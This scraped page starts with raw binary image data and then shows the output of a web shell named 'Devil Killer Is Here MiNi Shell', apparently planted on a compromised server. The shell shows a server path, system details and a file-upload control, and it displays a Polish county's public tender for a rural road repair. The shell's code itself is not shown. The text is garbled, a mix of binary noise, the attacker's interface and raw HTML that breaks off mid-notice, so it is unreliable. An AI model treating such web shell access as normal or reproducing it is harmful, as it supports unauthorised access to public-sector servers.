JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240904/0048524401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont drogi dojazdowej do gruntów rolnych 3046D Krzywina - Przeworno </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIATOWY ZARZĄD DRÓG W STRZELINIE</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">PZD Strzelin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 020820957</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kamienna 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Strzelin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">57-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">713921278</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">713921278</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapzd@powiatstrzelinski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiatstrzelinski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> budowa i utrzymanie dróg i mostów </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont drogi dojazdowej do gruntów rolnych 3046D Krzywina - Przeworno </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-42fb927e-2548-4609-b9af-387a2a15078a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00485244</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00080541/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Remont drogi dojazdowejdo gruntów rolnych 3046 D Krzywina - Przeworno</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-42fb927e-2548-4609-b9af-387a2a15078a <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej: https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>Szczegółowy opis zawiera SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">obowiązek informacyjny RODO zawiera SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZD.272.2.7.2024.WŁ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych inżynieryjnych remontu drogi nr 3046 D od km 10+385 do km 11+385 (działki nr 22 obręb Krzywina i 112 obręb Przeworno) w zakresie wykonania remontu nawierzchni jezdni, poboczy i oraz oczyszczenie i wyprofilowanie istniejących rowów przydrożnych<br/>Zakres projektu obejmuje:<br/>-	wykonanie nawierzchni jezdni,<br/>-	wykonanie nawierzchni jezdni,<br/>-	wykonanie poboczy,<br/>-	wykonanie zjazdów <br/>-	profilowanie istniejącego rowu<br/><br/>Remont wymagać będzie przeprowadzenia następujących prac:<br/>1)	frezowanie profilacyjne istniejących warstw bitumicznych,<br/>2)	ścinanie istniejących poboczy,<br/>3)	wykonanie nawierzchni zjazdów <br/>4)	wykonanie oczyszczenia, profilacji i odtworzenia istniejących rowów przydrożnych<br/>5)	wykonanie warstw bitumicznych nawierzchni betonu asfaltowego, <br/>6)	wykonanie poboczy,<br/>7)	obsianie skarp rowów mieszanką traw na warstwie ziemi urodzajnej.<br/>8)	wdrożenie oznakowania poziomego (w technologii grubowarstwowej) oraz wyniesienie oznakowania pionowego zgodnie z zatwierdzonym na wniosek Wykonawcy projektem stałej organizacji ruchu, wymianie na nowe podlegają wszystkie istniejące znaki pionowe;<br/>9)	złożenie destruktu bitumicznego w odległości do około 10 km zgodnie ze wskazaniem Zamawiającego (Strzelin, ul. Nyska);<br/>10) usunięcie we własnym zakresie powstałego podczas robót urobku oraz odpadów,<br/>11) zakupu i ustawienia tablic informacyjnych (łącznie 4 szt.).<br/><br/>Dane projektowe:<br/>-	Droga powiatowa <br/>-	Klasa drogi – lokalna (L)<br/>-	Kategoria ruchu – KR1<br/>-	Prędkość projektowa – 30km/h<br/>-	Jezdnia szerokości – 5,50 m <br/>-	Całkowita długość projektowanego odcinka drogi wynosi ~ 1000,00 m<br/>-	Powierzchnia jezdni ~ 5500,00m2<br/>-	Spadek poprzeczny jezdni – daszkowy oraz jednostronny<br/>-	Spadek poprzeczny poboczy – 6%<br/>-	Spadek poprzeczny jezdni – 2,0%<br/><br/><br/>W celu wykonania nawierzchni niezbędne jest wykonanie usunięcia istniejących warstw bitumicznych nawierzchni drogi (frezowanie profilacyjne). Należy dokonać również ścięcia istniejących poboczy gruntowych po wykonaniu frezowania istniejącej nawierzchni należy wykonać warstwę profilującą z betonu asfaltowego AC16W o śr. gr. 3-5 cm na przygotowanym podłożu należy wykonać ułożenie warstwy ścieralnej AC11S gr 5 cm . Wzdłuż nawierzchni należy wykonać pobocza z kruszywa 0/31,5 mm o grubości 10 cm zagęszczonego mechanicznie na podbudowie z kruszywa naturalnego gr 15 cm <br/><br/>Należy zwrócić szczególną uwagę na połączenia między kolejnymi warstwami konstrukcji drogi. Należy wykonać skropienie istniejącej nawierzchni po jej uprzednim mechanicznym oczyszczeniu przed ułożeniem warstwy kruszywa łamanego lub betonu asfaltowego. Następnie po ułożeniu kruszywa oraz pomiędzy warstwami asfaltowymi również należy wykonać skropienie przy zastosowaniu kationowych emulsji asfaltowych według PN-EN 13808 i WT-3 Emulsje asfaltowe. <br/><br/>Przed przystąpieniem do prac związanych z wykonywaniem projektowanych konstrukcji należy wykonać prace rozbiórkowe istniejących nawierzchni nie przeznaczonych do wykorzystania. <br/><br/>W miejscach połączenia nawierzchni jezdni dróg dobiegających z projektowanymi należy dokonać niezbędnych ich regulacji wysokościowych na powierzchni pozwalającej na prawidłowe ich połączenie (normatywne spadki poprzeczne i podłużne). <br/><br/>Konstrukcja projektowanej jezdni z wykorzystaniem istniejącej nawierzchni<br/>-	warstwa ścieralna z betonu asfaltowego AC11S gr. 5cm<br/>-	warstwa profilująca z betonu asfaltowego AC16W gr. 3-5 cm<br/>-	istniejąca podbudowa po sfrezowaniu warstw bitumicznych<br/><br/>Konstrukcja nawierzchni zjazdów<br/>-	warstwa ścieralna z betonu asfaltowego AC11S gr. 5cm<br/>-	Podbudowa zasadnicza z mieszanki niezwiązanej z kruszywa łamanego 0/31,5mm stabilizowanego mechanicznie gr. 15cm<br/>-	podbudowa z kruszywa stab. cementem Rm=2,5MPa grub. 10cm,<br/>-	warstwa kruszywa naturalnego stabilizowanego mechanicznie grub. 10cm.<br/><br/>Konstrukcja pobocza<br/>-	Kruszywo 0/31,5 mm gr. 10 cm <br/><br/>Zestawienie powierzchni<br/>•	Nawierzchnia jezdni całkowita ~ 5500,00m2<br/>•	Nawierzchnia pobocza ~ 1500,00 m2<br/>•	Nawierzchnia zjazdów z betonu asfaltowego ~ 90,00 m2<br/><br/>Uszczegółowienie przedmiotu zamówienia obejmuje projekt budowlany, a także przedmiar robót, który należy traktować jako materiał pomocniczy do wyceny oferty, a nie ściśle obowiązujący. Projekt budowlany oraz treść „Specyfikacji warunków zamówienia” jest dokumentem nadrzędnym w stosunku do przedmiaru robót.<br/><br/>W zakresie organizacji i przebiegu robót – sporządzenie i zatwierdzenie projektu czasowej zmiany organizacji ruchu wraz z jego wdrożeniem i utrzymywaniem w okresie prowadzenia prac budowlanych. <br/><br/>Wykonawca własnym staraniem opracuje, zatwierdzi a następnie wdroży projekt stałej organizacji ruchu (wymianie podlegają wszystkie znaki na odcinku objętym opracowaniem – zdemontowane znaki stanowią własność Zamawiającego i należy je dostarczyć do jego siedziby). Opracowany staraniem Wykonawcy projekt stałej organizacji ruchu, Wykonawca przedłoży do wymaganych przepisami prawa uzgodnień w terminie do trzech tygodni od przekazania placu budowy.<br/>Oznakowanie poziome należy wykonać w technologii grubowarstwowej. Zamawiający zakłada konieczność wymiany wszystkich znaków pionowych oraz ich uzupełnienia, jeśli zachodzi taka potrzeba zgodnie z obowiązującymi przepisami. Odnośnie oznakowania poziomego, Zamawiający oczekuje oznakowania wykonanego w technologii grubowarstwowej. Projekt winien uwzględniać linie krawędziowe ciągłe wąskie (mogą być wykonane jako grubowarstwowe strukturalne). Linie krawędziowe należy przerwać linią P-7c na zjazdach. Szczegóły oznakowania będzie zawierał opracowany przez Wykonawcę projekt stałej organizacji ruchu.<br/>Na oznakowanie poziome Wykonawca udzieli min. 2 lata gwarancji.<br/><br/>Wykonawca dodatkowo ustawi dwie tablice informacyjne na początku i końcu remontowanego odcinka drogi informujące o pozyskanym dofinansowaniu (2 szt.). Tablice o wymiarach 420mm x 297 mm należy wykonać w technice stosowanej przy produkcji drogowych tablic informacyjnych. Wzór tablicy w załączniku.<br/><br/>Dodatkowo w środku remontowanego odcinka, Wykonawca zakupi i ustawi tablice informacyjne o finansowaniu zadania ze środków Powiatu Strzelińskiego – 2 szt. (w kosztorysie ofertowym należy wyodrębnić koszt zakupu oraz montażu przedmiotowych tablic). Szczegóły dotyczące informacji jakie powinny zawierać tablice (o wymiarach 60 x 80 cm) oraz ich wzór zostaną przekazane w późniejszym terminie wyłonionemu Wykonawcy . Zamawiający zastrzega sobie prawo do zatwierdzenia projektu tablic przed ich wykonaniem.<br/><br/>Usunięcie powstałego podczas realizacji zamówienia urobku we własnym zakresie zgodnie <br/>z obowiązującymi przepisami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/>Cena ofertowa - waga: 60 %<br/>Okres gwarancji- waga: 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W zakresie Sytuacji ekonomicznej lub finansowej:Zamawiający uzna warunek za spełniony, gdy Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 1000 000,00 PLN. <br/>W zakresie Zdolności technicznej lub zawodowej: Zamawiający uzna, że wykonawca spełnia warunek jeżeli Wykonawca:<br/>a) wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował co najmniej trzy zadania/kontrakty polegające na budowie lub przebudowie drogi, w tym nawierzchni bitumicznych jezdni, o długości minimum 0,9 km (dla każdego kontraktu), wraz z podaniem rodzaju i długości drogi, daty i miejsca wykonania. Wykonawca winien wykazać, że ww. roboty zostały wykonane w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo oraz terminowo ukończone (protokoły odbioru, referencje);<br/>b) dysponuje osobą skierowaną do realizacji zamówienia publicznego, która pełnić będzie funkcję kierownika budowy, posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń, lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z zapisami SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Krajowy Rejestr Sądowy lub CEIDG <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości: 11 000,00 zł (słownie: jedenaście tysięcy złotych 00/100).<br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą. <br/>3.	Wadium może być wniesione w formach określonych w art. 97 ust. 7 ustawy PZP. <br/>4.	Jeżeli wadium jest wnoszone w innej formie niż w pieniądzu Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <br/>5.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: Gospodarczy Bank Spółdzielczy w Strzelinie nr 78 9588 0004 0000 1296 2000 0020, z adnotacją: „Wadium – PZD.272.2.7.2024.WŁ „Remont drogi Krzywina - Przeworno”. <br/>(potwierdzenie wpłaty należy załączyć do oferty). Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/><br/>Szczegółowy opis dotyczący wadium zawiera SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy.<br/>Do oferty wspólnej Wykonawcy dołączają pełnomocnictwo.<br/>Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego<br/>Zamawiający kieruje informacje, korespondencję itp.<br/>Oferta wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać następujące wymagania:<br/>a) oferta wspólna powinna być sporządzona zgodnie z SWZ,<br/>b) sposób składania dokumentów w ofercie wspólnej:<br/>− dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw do<br/>wykluczenia składa każdy z Wykonawców składających ofertę wspólną we własnym imieniu;<br/>− dokumenty wspólne takie jak np.: formularz ofertowy, dokumenty podmiotowe i przedmiotowe składa pełnomocnik Wykonawców w imieniu wszystkich Wykonawców składających ofertę wspólną.<br/>Przed podpisaniem umowy (w przypadku wygrania postępowania) Wykonawcy składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę konsorcjum, zawierającą, co najmniej:<br/>a) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia,<br/>b) określenie zakresu działania poszczególnych stron umowy,<br/>c) czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację<br/>zamówienia oraz czas trwania gwarancji jakości i rękojmi <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy wskazane zostały w projekcie umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą Platformy e-Zamówienia dostępnej pod adresem: 